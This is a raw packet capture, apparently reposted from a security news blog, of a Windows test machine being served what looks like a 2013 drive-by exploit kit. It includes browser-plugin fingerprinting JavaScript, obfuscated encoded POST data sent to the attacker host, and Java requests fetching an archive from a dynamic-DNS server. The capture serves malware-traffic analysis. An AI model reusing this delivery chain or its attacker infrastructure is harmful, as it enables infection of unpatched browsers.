Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.738628 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 301:566, ack 926, win 125, length 265
[email protected]………z..@…..o.x..P..}….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

32
// tcrikyvgjfczifzirpdpkocfscsdktidvamgzhminpivvhd
0
2013-06-18 19:25:25.740091 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 926:1391, ack 566, win 16418, length 465
E…W.@….-..z……[email protected]…..xP.@”;}..GET /jvjskjfrp.css HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:25.760202 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2770:3080, ack 1490, win 144, length 310
E..^[email protected]………z..@…..*.H..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

5f
// ztyxzszfvurhbvplkmslduqnoyxbjaljujgtbgywaqecltnwgfhjaywowuqgvbppkwjldiidyngkgtgnzowzmtojoepk
0
2013-06-18 19:25:25.761739 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 327:629, ack 936, win 125, length 302
[email protected]………z..@…….e..P..}K…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

65
ibcmpqzomkssmhtgfmogteynnvqxwjhflkraaqpnbhfnpzuumjbfnzsavjxrtfweqnfqeudfcjtrinluwnakmtkidizxowcekhuoc
0
2013-06-18 19:25:25.802432 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 3142:4482, ack 939, win 125, length 1340
E..d’[email protected]. …….z..@..).`.fs..P..}.1..a=a.toLowerCase().replace(/\s/g,"");b=this.Plugins[a];
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installed)||(b.installed=null,b.version=null,b.version0=null,b.getVersionDone=null,b.pluginName=a);if(this.isIE&&!this.ActiveXEnabled&&"java"!==a)return c.status=-2,c;c.status=1;return c},getPluginFileVersion:function(a,b){var c,d,e,f,g=-1;if(2<this.OS||!a||!a.version||!(c=this.getNum(a.version)))return b;if(!b)return c;c=this.formatNum(c);b=this.formatNum(b);d=b.split(this.splitNumRegx);e=c.split(this.splitNumRegx);for(f=0;f<d.length;f++)if(-1<
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;return c},AXO:window.ActiveXObject,getAXO:function(a){var b=null;try{b=new this.AXO(a)}catch(c){}return b},convertFuncs:function(a){var b,c,d=/^[\$][\$]/;for(b in a)if(d.test(b))try{c=b.slice(2),0<c.length&&!a[c]&&(a[c]=a[b](a),delete a[b])}catch(e){}},initObj:function(a,b,c){var d;if(a){if(1==a[b[0]]||c)for(d=0;d<b.length;d+=2)a[b[d]]=b[d+1];for(d in a)(c=a[d])&&1==c[b[0]]&&this.initObj(c,b)}},initScript:function(){var a=navigator,
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a.product||"";this.initObj(this,["$",this]);for(b in this.Plugins)this.Plugins[b]&&this.initObj(this.Plugins[b],["$",this,"$$",this.Plugins[b]],1);this.convertFuncs(this);this.OS=100;if(f){var g=["Win",1,"Mac",
2013-06-18 19:25:25.948541 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 559:811, ack 1393, win 142, length 252
[email protected]………z..@.._.c…..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

25
// buhzipybhvpjryvjmyouofvwwvowwrzxlh
0
2013-06-18 19:25:25.957569 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 14142:15522, ack 939, win 125, length 1380
E…’[email protected]. …….z..@..)…fs..P..}….ll,winLoaded:e.winLoaded,tagName:a,outerHTML:g,DOM:this,width:this.width,obj:this.obj};if(this.div&&this.div.parentNode){this.setStyle(h,k.concat(["fontSize",this.pluginSize+3+"px","lineHeight",this.pluginSize+3+"px","verticalAlign","baseline","display","inline"]));this.div.appendChild(h);try{h.innerHTML=g}catch(l){}a.span=h;a.winLoaded=e.winLoaded}return a}},
file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(a,b,c){var d=this.$;a&&d.isDefined(c)&&(a[this.any]||(a[this.any]=[]),a[this.valid]||(a[this.valid]=[]),a[this.any].push(c),(b=this.split(b,c))&&a[this.valid].push(b))},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(a,b){return a&&a[this.valid]?this.get(a[this.valid],b):null},getAny:function(a,b){return a&&a[this.any]?
this.get(a[this.any],b):null},get:function(a,b){var c=a.length-1,d=this.$.isNum(b)?b:c;return 0>d||d>c?null:a[d]},split:function(a,b){var c=this.$,d=null,e;a=a?a.replace(".","\\."):"";e=RegExp("^(.*[^\\/])("+a+"\\s*)$");c.isString(b)&&e.test(b)&&(c=RegExp.$1.split("/"),d={name:c[c.length-1],ext:RegExp.$2,full:b},c[c.length-1]="",d.path=c.join("/"));return d},z:0},Plugins:{quicktime:{mimeType:["video/quicktime","application/x-quicktimeplayer","image/x-macpaint","image/x-quicktime"],progID:"QuickTimeCh
2013-06-18 19:25:25.969905 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 759:985, ack 1396, win 142, length 226
E..
[email protected]……[email protected]#.n7}X.P….P..HTTP/1.1 200 OK

Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

c
// iisukhquz
0
2013-06-18 19:25:26.002400 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 566:975, ack 1391, win 142, length 409
E…[email protected]………z..@…..x.x.uP….w..HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

d0
ybrjnscxwngmgzzgorzzrghbwqujnkellvvzoywlldyrdyyspxrgeziapcjcmnoyjkxyiujuyhmcfkuvimcmlknanxdalsyvcwtlrdfpkrsqcmmkyoxkzkkmhomtglojhhuykaovsgmutyfsnccmmmzualohxcqekldvlsqeydzrcejpgmctyboznchkfxopiskukbzieyagckwi
0
2013-06-18 19:25:26.004491 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 22422:23802, ack 939, win 125, length 1380
E…’[email protected]. …….z..@..)..
fs..P..}.2..?1:c?-0.2:-1);2==this.OTF&&(this.NOTF&&!this.applet.getResult()[0]&&!this.lang.System.getProperty()[0])&&(this.installed=c?-0.2:-1);c&&(this.version0=e.formatNum(e.getNum(c)));a&&!g&&(this.version=e.formatNum(e.getNum(a)));b&&e.isString(b)&&(this.vendor=b);this.vendor||(this.vendor="");this.verify&&
this.verify.isEnabled()?this.getVersionDone=0:1!=this.getVersionDone&&(this.getVersionDone=2>this.OTF?0:this.applet.can_Insert_Query_Any()?0:1);e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(){var a=this.$;return a.isIE&&
(6>a.verIE||!a.ActiveXEnabled)||a.isGecko&&0>=a.compareNums(a.verGecko,a.formatNum("1.6"))||a.isSafari&&1==a.OS&&(!a.verSafari||0>a.compareNums(a.verSafari,"5,1,0,0"))||a.isChrome?1:0},query:function(){var a=this.$,b=this.$$,c,d,e=a.DOM.altHTML,f={},g,h=null,j=null,k=this.hasRun||this.isDisabled();this.hasRun=1;if(k)return this;this.status=0;if(a.isIE)for(c=0;c<this.classID.length&&!(this.HTML=a.DOM.insert("object",["classid",this.classID[c]],[],e),h=this.HTML.obj(),a.getPROP(h,"jvms"));c++);else if((d=
a.hasMimeType(this.mimeType))&&d.type)this.HTML=a.DOM.ins
2013-06-18 19:25:26.010786 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 2770:3080, ack 1490, win 144, length 310
E..^[email protected]………z..@…..*.H..P…….HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

5f
// ztyxzszfvurhbvplkmslduqnoyxbjaljujgtbgywaqecltnwgfhjaywowuqgvbppkwjldiidyngkgtgnzowzmtojoepk
0
2013-06-18 19:25:26.013870 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 327:629, ack 936, win 125, length 302
[email protected]………z..@…….e..P..}K…HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:25 GMT
Content-Type: text/css
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

65
ibcmpqzomkssmhtgfmogteynnvqxwjhflkraaqpnbhfnpzuumjbfnzsavjxrtfweqnfqeudfcjtrinluwnakmtkidizxowcekhuoc
0

2013-06-18 19:25:26.063833 IP 192.168.122.178.49359 > 199.195.249.188.8000: Flags [P.], seq 1490:1955, ack 3080, win 16423, length 465
E…X.@…….z……[email protected]…..`P.@’[email protected] /mgylmdxkq.png HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.063996 IP 192.168.122.178.49361 > 199.195.249.188.8000: Flags [P.], seq 936:1399, ack 629, win 16403, length 463
E…X.@…….z……[email protected]……P.@..*..GET /szqbqjq.png HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064147 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 1393:1853, ack 811, win 16357, length 460
E…X.@…….z……..@…._.d.P.?…..GET /txvu.jpg HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064280 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 1396:1857, ack 985, win 16314, length 461
E…X.@…….z……..@7}X.p#.PP.?..t..GET /plrjx.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064429 IP 192.168.122.178.49360 > 199.195.249.188.8000: Flags [P.], seq 1391:1861, ack 975, win 16316, length 470
E…X.@…….z……[email protected]….P.?…..GET /obzmmphsihjjxs.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.064569 IP 192.168.122.178.49364 > 199.195.249.188.8000: Flags [P.], seq 939:1410, ack 42230, win 16560, length 471
GET /tutoogrerinpmdl.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive


2013-06-18 19:25:26.290517 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 811:1255, ack 1853, win 159, length 444
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

f1
wbomnjerpmtljpizcebuawvdhnyvtctpdibrrgjhtcscrbctfdofakjhyidrkwgoeigwopehsxkjymdeqrkqctxabarlxyacggzvwddoanyyzccpunfwgdwheotbmuesbdoxgrmhfkfeniuhwaeceajipdkbxouyriwyaifftlkgufoqgssktctigdkdrecjnyiohntbzeitjwkppcajftslxcpphsyuqhiyuczughnqeyftb
0
2013-06-18 19:25:26.292608 IP 192.168.122.178.49363 > 199.195.249.188.8000: Flags [P.], seq 1853:2315, ack 1255, win 16246, length 462
GET /koqavj.gif HTTP/1.1
Accept: */*
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Connection: Keep-Alive
2013-06-18 19:25:26.294641 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 985:1445, ack 1857, win 159, length 460
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

101
svoiignjsebvwhzduimxrmgsshrhifhaavjjcxsvburybqbvyotqazjthabpfiqgeaphxiczctxdjzzinszosihzjioprfwwfmdcugcxzzbjyasltsalbhlkqaaifweljindoqbopcxocqaviahjhtuytugzrlkatyeiofwehusklsgttndbhxzasfakqklkiqswvpadktnvmupfisgpqgqimqtcaenjugfqvgugahbmcrrkjyzzepiqgbtgfgpan
0
2013-06-18 19:25:26.301355 IP 199.195.249.188.8000 > 192.168.122.178.49360: Flags [P.], seq 975:1417, ack 1861, win 159, length 442
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

f0
gttgvxysyaxooujjsvahiiippapjsthymbeizcaxdymstvclqctzlcpacejuxrtktxssztqdrcvkyxwpapplreluivpgniqgfjyfdojurefpcbfcruoiyzdhvsnibeohonnrcwmtbrjdtpfljttitxqpqexrimzxamociawksgnmvtxfnqogoevejtwrgvpgidirefbwloihhfnuwcblhxqqqmiwixdqbmifrjcdylkgrybo
0

2013-06-18 19:25:26.306551 IP 199.195.249.188.8000 > 192.168.122.178.49361: Flags [P.], seq 629:896, ack 1399, win 142, length 267
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

41
xrbhjvqnyqvmiohhmriqpqgfgjjwozcmqeuaakozbkljytqkkzbzqiewrotgowsfa
0
2013-06-18 19:25:26.306881 IP 199.195.249.188.8000 > 192.168.122.178.49359: Flags [P.], seq 3080:3465, ack 1955, win 161, length 385
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

b7
uodmzatqwhyqucgygwbdmxlppewzwlrrzudzvxpseojzrpxxmzbzxmomrlmnwdfwyivtflmkzvkrlioxiqwfdlsuxeitinqgvmabynmyiwpufdsnuotxamrxqzrzmigiugktuwrctgxykpleefbfrscisuhfcnnxuyqovirooonydzcieenvxpd
0
2013-06-18 19:25:26.324512 IP 199.195.249.188.8000 > 192.168.122.178.49364: Flags [P.], seq 42230:42685, ack 1410, win 142, length 455
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

fd
dziwvgwgfwfkraifcmavhqlmkrxuujuxjcufjqlpmraerijuvkpdbbplsngnxakgdflmvxbiocmgkwaggqjirztkmzxjziqdnbpjzrrotdvezwkgmuoetipghnqhvgkjhashrjvlnqpmmaszvhepptvxglecrplzqegiobtbsjnfkgefoiudcpajbfltvxslbztpbnrtwfygldmamgdpwdyxjkqehipjijzjwqctvbahfmhrtkgpoemxpdcwl
0
2013-06-18 19:25:26.552165 IP 199.195.249.188.8000 > 192.168.122.178.49363: Flags [P.], seq 1255:1542, ack 2315, win 175, length 287
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

55
rhqphmstalzmuzzcfynipwkfgymhlepdmgstskntwmfrletrdhasdlyjjkrupgybnqufbiyxvephjiympzftk
0

2013-06-18 19:25:26.728803 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 1857:2471, ack 1445, win 16560, length 614
POST /boezkexoxrlbjwxii HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://1208b83b81c141ecd6f05e24.webhop.org:8000/aotyprvqvj?hash=6a4c601e0802b403736ff29f3ceaa7c0&qspot=4012736
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Content-Length: 750
Connection: Keep-Alive
Cache-Control: no-cache
2013-06-18 19:25:26.728942 IP 192.168.122.178.49362 > 199.195.249.188.8000: Flags [P.], seq 2471:3221, ack 1445, win 16560, length 750
E…X.@…….z……..@7}\.p#..P.@…..rjdnwzbergbxgkxv=oirewfai&ewgstvpkgrud=%2514K%2502%2509%2502%2501%2508%2507%251CKH%251EU%2507%2505%2506%250D%250C-%2517%2512%2507%2505%250C%251DKHGFVMYCY%255EUUJC%2503%250E%251F%2513GMDPEYEBIESCEM%250F%251E%2504%2504%250ECS%2501%251C%251E%2509%255BD%2510%251C%2506%250A%2519%253A%2503%250F%250C%250CMS%251C%2510%251B%250AMK%251D%250C%2513%2509(%2516%250D%2508%2516%250C%2500GM%2508%2514%2505%2503EP%2516%251F%2509%2502%2502%2518%2508%2504%2500U%255C%250F%251C%2503%2505%255EG%2504%250F%250D%251F%250A%251B-%2509%251E%2501%2509%251DMS%251C%2510%251B%250AMK%2519%2505%2511GM%2508%2514%2505%2503EP%2512%251A%2516CS%2501%251C%251E%2509%250AJC%2501%2506%250DP_USP%250A_%250F%2513RB%2507%2500%2508%255D%250A%2511%2504AT%2502X%255B%255D%2513%2503%2514D%251C
2013-06-18 19:25:26.998061 IP 199.195.249.188.8000 > 192.168.122.178.49362: Flags [P.], seq 1445:2427, ack 3221, win 201, length 982
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 19 Jun 2013 00:25:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.6

2fc
S%08%02%15%1B%03%15I%0E%1B%11%0D%1E%10%04TH%01%06%11%07%5CNF%5E%5BB%5D%15%5ER%0BWX%11TCW%04%0A%0B_%14UB%03S%5DA%1E%17%07%1F%09%11G%00%1B%15_OVQY%40%0A%10%16%03%0E%02%0F%1EV%1F%0C%1A%15%13%1E%1CT%1C%16%1F%04%05%08%06%18%1C%04%0EAA%0A%00%0D%17XP%27%13%1DHI%05%0C%13%12%09THXBBW%0E%04%00%08%01%06XPWQNQc%7Bl~ohU%1F%08%00%04%1AF%0F%08%02%0COB%12%1E%04%0AHI%04%04%1B%13%04TH%08%3A7G%05%25%06%19%25%08%20%0E%2B%25%01%06%266%2B%1E%29%25%2F%05%24%264%0F%3C6%27%04%27%1F%3C%00%286%3C%16%271PD%3C6%23%00%0BA%24%02%04R%23%01%26%18%02%00%2B%25%28%193%3A%2F%1C%3C%26%23%019%40T%1B%3F%0C%01%17%0D%3A%01B%3FS%0D%019%25P%0D%07%26%23%040%25%09%0F%04%0C%2FZNLo~oh%60fU%02%04%05%07%0CI%01%08%1F%00JA%19%02%0A%10UE%01%07%0D%1C%0ATU%0B%0E%0A%09%1F%18NLo~oh%60SF%13%15%07%0A%04%1DQc%7Bl
0
2013-06-18 19:25:30.201138 IP 192.168.122.178.49367 > 199.195.249.188.8000: Flags [P.], seq 1442891400:1442891714, ack 1479034204, win 258, length 314
GET /cbsthcfq?mimsrws=nshbdaiqnay HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2013-06-18 19:25:30.861555 IP 192.168.122.178.49368 > 199.195.249.188.8000: Flags [P.], seq 4010440799:4010441036, ack 1088642486, win 258, length 237
GET /drddbg?mebhqtwycgg=nshbdaiqnay HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_25
Host: 1208b83b81c141ecd6f05e24.webhop.org:8000
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the original post: here
